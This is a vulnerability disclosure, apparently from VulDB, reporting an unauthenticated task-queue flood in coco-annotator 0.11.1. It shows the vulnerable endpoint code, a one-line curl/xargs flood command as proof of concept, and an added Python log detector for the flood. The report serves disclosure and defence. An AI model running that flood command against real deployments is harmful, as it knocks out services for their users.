Submission #745547: coco-annotator 0.11.1 Denial of Service information

Title: coco-annotator 0.11.1 Denial of Service
Description:

Summary

The endpoint /api/info/long_task is exposed without authentication or rate limiting, and allows any remote user to enqueue Celery background tasks and write entries to the database (TaskModel) on every request. This creates a critical Denial of Service (DoS) vulnerability. An attacker can flood the endpoint with repeated requests, overwhelming the Celery queue and workers, bloating the database, and rendering the entire application unresponsive — even after the attack stops.

Details

Vulnerable Endpoint: /api/info/long_task

PoC

1. Run attack flood:
   seq 1 9999999 | xargs -n1 -P50 curl -s http://localhost:5001/api/info/long_task > /dev/null
2. Observe symptoms:
   - Frontend (COCO Annotator) becomes unresponsive ("Loading datasets…" spinner indefinitely)
   - HTTP requests slow down or fail: curl -o /dev/null -s -w "Total: %{time_total}s\n" http://localhost:5001/api/info/long_task
   - System logs show massive task creation and MongoDB inserts
   - redis-cli LLEN celery shows queue depth growing uncontrollably
3. Even after stopping the flood (CTRL+C), system remains unusable

Affected Code

```python
@api.route('/long_task')
class TaskTest(Resource):
    def get(self):
        task_model = TaskModel(group="test", name="Testing Celery")
        task_model.save()
        task = long_task.delay(20, task_model.id)
        return {'id': task.id, 'state': task.state}
```

Missing: @login_required, @limiter.limit(...)
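As an added example (not part of the submission above or of the COCO Annotator project), a log-side detector for the flood pattern this report describes: it parses combined-format web server access log lines and counts hits to /api/info/long_task per client over a 60-second sliding window, reporting any client that exceeds a threshold. The sample log lines are constructed, and the threshold of 20 requests per window is an assumption to tune against real traffic.

```python
# Added example: detect a request flood against /api/info/long_task in
# combined-format access logs (nginx/Apache style). Not project code.
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_PATH = "/api/info/long_task"
WINDOW_SECONDS = 60
THRESHOLD = 20  # assumed: requests per client per window; tune to real traffic

def parse_line(line):
    """Return (client_ip, timestamp, path) for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path")

def find_floods(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {client_ip: peak requests seen inside one window} for clients over threshold."""
    recent = defaultdict(deque)  # per-client timestamps of hits to TARGET_PATH
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path = parsed
        if path.split("?")[0] != TARGET_PATH:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:  # drop hits older than the window
            q.popleft()
        if len(q) > threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

# Constructed sample: one client sends 25 hits within 25 seconds, another sends one.
SAMPLE_LOG = [
    f'203.0.113.7 - - [23/Jan/2026:14:20:{i % 60:02d} +0000] "GET /api/info/long_task HTTP/1.1" 200 41 "-" "curl/8.5.0"'
    for i in range(25)
] + [
    '198.51.100.9 - - [23/Jan/2026:14:20:10 +0000] "GET /api/info/long_task HTTP/1.1" 200 41 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [23/Jan/2026:14:21:10 +0000] "GET /api/dataset/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_floods(SAMPLE_LOG))  # {'203.0.113.7': 25}
```

The same counter run at ingest time (for example in a reverse-proxy access-log tail) gives an alert before the Celery queue and the TaskModel collection grow past recovery.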
Source: https://github.com/nmmorette/vulnerability-research/blob/main/coco-anotator/Unauthenticated%20Task%20Queue%20Flood%20in%20COCO%20Annotator%202f1ef09b873680f99d39e3f7db9886fa.md
User: nmmorette (UID 87361)
Submitted: January 23, 2026 14:20 (5 months ago)
Moderation: February 6, 2026 15:23 (14 days later)
Status: Accepted
VulDB entry: 344684 [jsbroks COCO Annotator up to 0.11.1 Endpoint /api/info/long_task denial of service]
Points: 20
